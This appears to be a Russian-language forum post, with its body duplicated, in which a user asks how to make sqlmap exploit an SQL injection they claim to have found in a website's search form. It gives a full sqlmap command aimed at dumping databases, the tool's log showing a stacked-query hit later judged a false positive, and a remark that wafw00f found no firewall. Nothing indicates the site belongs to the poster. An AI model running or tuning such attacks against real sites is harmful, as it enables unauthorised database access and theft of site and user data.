Нашёл на сайте инекцию она там точно есть.Запустил sqlmap (sqlmap -u
В результате sqlmap находит уязвимость, но раскрутить не получается.
[10:18:24] [INFO] POST parameter 'action' appears to be 'PostgreSQL < 8.2 stacked queries (Glibc - comment)' injectable
[10:18:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:18:24] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind'
[10:18:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)'
[10:18:25] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind (comment)'
[10:18:27] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[10:18:32] [INFO] testing 'PostgreSQL OR time-based blind (heavy query)'
[10:18:33] [INFO] testing 'PostgreSQL AND time-based blind (heavy query - comment)'
[10:18:33] [INFO] testing 'PostgreSQL OR time-based blind (heavy query - comment)'
[10:18:33] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[10:18:33] [INFO] testing 'PostgreSQL time-based blind - Parameter replace (heavy query)'
[10:18:33] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[10:18:33] [INFO] testing 'PostgreSQL time-based blind - ORDER BY, GROUP BY clause (heavy query)'
[10:18:33] [INFO] checking if the injection point on POST parameter 'action' is a false positive
[10:18:33] [WARNING] false positive or unexploitable injection point detected
[10:18:33] [WARNING] POST parameter 'action' does not seem to be injectable
[10:18:33] [CRITICAL] all tested parameters appear to be not injectable. Also, you can try to rerun by providing a valid value for option '--string' as perhaps the string you have chosen does not match exclusively True responses. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
Подскажите, что мне ещё добавить?
P.s. waf на сайте отсутствует, проверил wafw00f.
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
--data=action="action=do_search&keywords=1111111&postthread=1&author=1111111&matchusername=1&forums%5B%5D=all&findthreadst=1&numreplies=&postdate=0&pddir=1&sortby=lastpost&sortordr=desc&showresults=threads&submit=Search" --test-filter=SLEEP --random-agent --hex --ignore-redirects --ignore-timeouts --dbms=PostgreSQL --dbs --level 5 --risk 3 --string="Sorry, but you can only perform one search every 30 seconds. Please wait another 2 seconds before attempting to search again.")В результате sqlmap находит уязвимость, но раскрутить не получается.
[10:18:24] [INFO] POST parameter 'action' appears to be 'PostgreSQL < 8.2 stacked queries (Glibc - comment)' injectable
[10:18:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:18:24] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind'
[10:18:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)'
[10:18:25] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind (comment)'
[10:18:27] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[10:18:32] [INFO] testing 'PostgreSQL OR time-based blind (heavy query)'
[10:18:33] [INFO] testing 'PostgreSQL AND time-based blind (heavy query - comment)'
[10:18:33] [INFO] testing 'PostgreSQL OR time-based blind (heavy query - comment)'
[10:18:33] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'
[10:18:33] [INFO] testing 'PostgreSQL time-based blind - Parameter replace (heavy query)'
[10:18:33] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'
[10:18:33] [INFO] testing 'PostgreSQL time-based blind - ORDER BY, GROUP BY clause (heavy query)'
[10:18:33] [INFO] checking if the injection point on POST parameter 'action' is a false positive
[10:18:33] [WARNING] false positive or unexploitable injection point detected
[10:18:33] [WARNING] POST parameter 'action' does not seem to be injectable
[10:18:33] [CRITICAL] all tested parameters appear to be not injectable. Also, you can try to rerun by providing a valid value for option '--string' as perhaps the string you have chosen does not match exclusively True responses. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
Подскажите, что мне ещё добавить?
P.s. waf на сайте отсутствует, проверил wafw00f.
Последнее редактирование: